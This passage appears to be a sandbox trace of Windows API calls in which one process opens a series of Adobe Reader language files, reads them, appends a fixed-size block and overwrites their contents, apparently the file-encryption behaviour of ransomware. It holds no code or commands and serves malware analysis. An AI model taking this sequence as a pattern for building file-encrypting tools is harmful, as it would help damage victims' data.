ReadFile (in: hFile=0x1dc, lpBuffer=0x1eace08, nNumberOfBytesToRead=0x9a3, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eace08*, lpNumberOfBytesRead=0x331f2bc*=0x9a3, lpOverlapped=0x0) returned 1 [0114.237] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0114.237] WriteFile (in: hFile=0x1dc, lpBuffer=0x1ea99e8*, nNumberOfBytesToWrite=0xf2b, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea99e8*, lpNumberOfBytesWritten=0x331f2d0*=0xf2b, lpOverlapped=0x0) returned 1 [0114.237] CloseHandle (hObject=0x1dc) returned 1 [0114.237] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\finphon.env" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\finphon.env"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0114.239] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0114.239] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0xd4d [0114.239] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0114.239] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0114.239] ReleaseMutex (hMutex=0x168) returned 1 [0114.239] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="finphon.env", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0114.239] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="finphon.env", cchWideChar=11, lpMultiByteStr=0x1f7328c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="finphon.env", lpUsedDefaultChar=0x0) returned 11 [0114.239] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ea99e8, nNumberOfBytesToRead=0xd4d, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ea99e8*, lpNumberOfBytesRead=0x331f2bc*=0xd4d, lpOverlapped=0x0) returned 1 [0114.250] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0114.251] WriteFile (in: hFile=0x1dc, lpBuffer=0x1ea3958*, nNumberOfBytesToWrite=0x12d5, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesWritten=0x331f2d0*=0x12d5, lpOverlapped=0x0) returned 1 [0114.251] CloseHandle (hObject=0x1dc) returned 1 [0114.251] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\gre110.hsp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\gre110.hsp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0114.306] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0114.306] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x48db5 [0114.306] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0114.306] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0114.306] ReleaseMutex (hMutex=0x168) returned 1 [0114.306] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="gre110.hsp", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0114.306] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="gre110.hsp", cchWideChar=10, lpMultiByteStr=0x1f7362c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gre110.hsp", lpUsedDefaultChar=0x0) returned 10 [0114.306] ReadFile (in: hFile=0x1dc, lpBuffer=0x2882db8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesRead=0x331f278*=0x8000, lpOverlapped=0x0) returned 1 [0114.320] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x47db5 [0114.320] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ea89b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea89b8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0114.349] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x47db5 [0114.349] WriteFile (in: hFile=0x1dc, lpBuffer=0x288ade8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x288ade8*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0114.351] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0114.351] WriteFile (in: hFile=0x1dc, lpBuffer=0x289f878*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x289f878*, lpNumberOfBytesWritten=0x331f28c*=0x8000, lpOverlapped=0x0) returned 1 [0114.351] CloseHandle (hObject=0x1dc) returned 1 [0114.356] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\heb.hyp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\heb.hyp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0114.363] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0114.363] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x2800 [0114.363] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0114.363] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0114.363] ReleaseMutex (hMutex=0x168) returned 1 [0114.363] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="heb.hyp", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0114.363] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="heb.hyp", cchWideChar=7, lpMultiByteStr=0x1f7ac6c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="heb.hyp", lpUsedDefaultChar=0x0) returned 7 [0114.363] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ea89b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea89b8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0114.798] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x1800 [0114.798] ReadFile (in: hFile=0x1dc, lpBuffer=0x1e96408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1e96408*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0114.817] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x1800 [0114.817] WriteFile (in: hFile=0x1dc, lpBuffer=0x2866c88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2866c88*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0114.817] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0114.817] WriteFile (in: hFile=0x1dc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0114.817] CloseHandle (hObject=0x1dc) returned 1 [0114.817] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\hun.hyp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\hun.hyp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0114.819] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0114.819] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x1c000 [0114.819] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0114.819] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0114.819] ReleaseMutex (hMutex=0x168) returned 1 [0114.819] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="hun.hyp", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0114.819] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="hun.hyp", cchWideChar=7, lpMultiByteStr=0x1f7ac84, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="hun.hyp", lpUsedDefaultChar=0x0) returned 7 [0114.819] ReadFile (in: hFile=0x1dc, lpBuffer=0x2663838, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesRead=0x331f278*=0x4000, lpOverlapped=0x0) returned 1 [0114.887] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x1b000 [0114.887] ReadFile (in: hFile=0x1dc, lpBuffer=0x2866c88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2866c88*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0114.895] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x1b000 [0114.895] WriteFile (in: hFile=0x1dc, lpBuffer=0x2866c88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2866c88*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0114.896] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0114.896] WriteFile (in: hFile=0x1dc, lpBuffer=0x1ea3958*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesWritten=0x331f28c*=0x4000, lpOverlapped=0x0) returned 1 [0114.896] CloseHandle (hObject=0x1dc) returned 1 [0114.896] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\lav.hyp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\lav.hyp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0114.897] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0114.897] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x3400 [0114.898] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0114.898] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0114.898] ReleaseMutex (hMutex=0x168) returned 1 [0114.898] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="lav.hyp", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0114.898] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="lav.hyp", cchWideChar=7, lpMultiByteStr=0x1f7ac84, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lav.hyp", lpUsedDefaultChar=0x0) returned 7 [0114.898] ReadFile (in: hFile=0x1dc, lpBuffer=0x1e96408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1e96408*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0114.945] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x2400 [0114.945] ReadFile (in: hFile=0x1dc, lpBuffer=0x1e96408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1e96408*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0114.969] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x2400 [0114.969] WriteFile (in: hFile=0x1dc, lpBuffer=0x288ade8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x288ade8*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0114.970] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0114.970] WriteFile (in: hFile=0x1dc, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0114.970] CloseHandle (hObject=0x1dc) returned 1 [0114.970] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\nrw.fca" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\nrw.fca"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0114.971] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0114.971] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x47c [0114.971] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0114.971] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0114.971] ReleaseMutex (hMutex=0x168) returned 1 [0114.972] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nrw.fca", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0114.972] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nrw.fca", cchWideChar=7, lpMultiByteStr=0x1f7ac84, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nrw.fca", lpUsedDefaultChar=0x0) returned 7 [0114.972] ReadFile (in: hFile=0x1dc, lpBuffer=0x289e998, nNumberOfBytesToRead=0x47c, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x289e998*, lpNumberOfBytesRead=0x331f2bc*=0x47c, lpOverlapped=0x0) returned 1 [0114.990] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0114.990] WriteFile (in: hFile=0x1dc, lpBuffer=0x1eace08*, nNumberOfBytesToWrite=0xa04, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eace08*, lpNumberOfBytesWritten=0x331f2d0*=0xa04, lpOverlapped=0x0) returned 1 [0114.990] CloseHandle (hObject=0x1dc) returned 1 [0114.991] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\nyn47.hsp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\nyn47.hsp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0114.991] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0114.991] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x3b11d [0114.992] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0114.992] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0114.992] ReleaseMutex (hMutex=0x168) returned 1 [0114.992] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nyn47.hsp", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0114.992] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nyn47.hsp", cchWideChar=9, lpMultiByteStr=0x1f7320c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nyn47.hsp", lpUsedDefaultChar=0x0) returned 9 [0114.992] ReadFile (in: hFile=0x1dc, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x331f278*=0x8000, lpOverlapped=0x0) returned 1 [0115.026] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x3a11d [0115.027] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0115.088] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x3a11d [0115.089] WriteFile (in: hFile=0x1dc, lpBuffer=0x1e943a8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e943a8*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0115.089] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0115.089] WriteFile (in: hFile=0x1dc, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x331f28c*=0x8000, lpOverlapped=0x0) returned 1 [0115.089] CloseHandle (hObject=0x1dc) returned 1 [0115.090] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\prt39.hsp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\prt39.hsp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0115.091] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0115.091] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x1766c [0115.091] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0115.091] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0115.091] ReleaseMutex (hMutex=0x168) returned 1 [0115.091] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="prt39.hsp", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0115.091] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="prt39.hsp", cchWideChar=9, lpMultiByteStr=0x1f7352c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="prt39.hsp", lpUsedDefaultChar=0x0) returned 9 [0115.091] ReadFile (in: hFile=0x1dc, lpBuffer=0x2663838, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesRead=0x331f278*=0x4000, lpOverlapped=0x0) returned 1 [0115.134] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x1666c [0115.134] ReadFile (in: hFile=0x1dc, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0115.433] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x1666c [0115.433] WriteFile (in: hFile=0x1dc, lpBuffer=0x288ade8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x288ade8*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0115.433] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0115.434] WriteFile (in: hFile=0x1dc, lpBuffer=0x2663838*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesWritten=0x331f28c*=0x4000, lpOverlapped=0x0) returned 1 [0115.434] CloseHandle (hObject=0x1dc) returned 1 [0115.434] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\rus32.clx" (normalized: 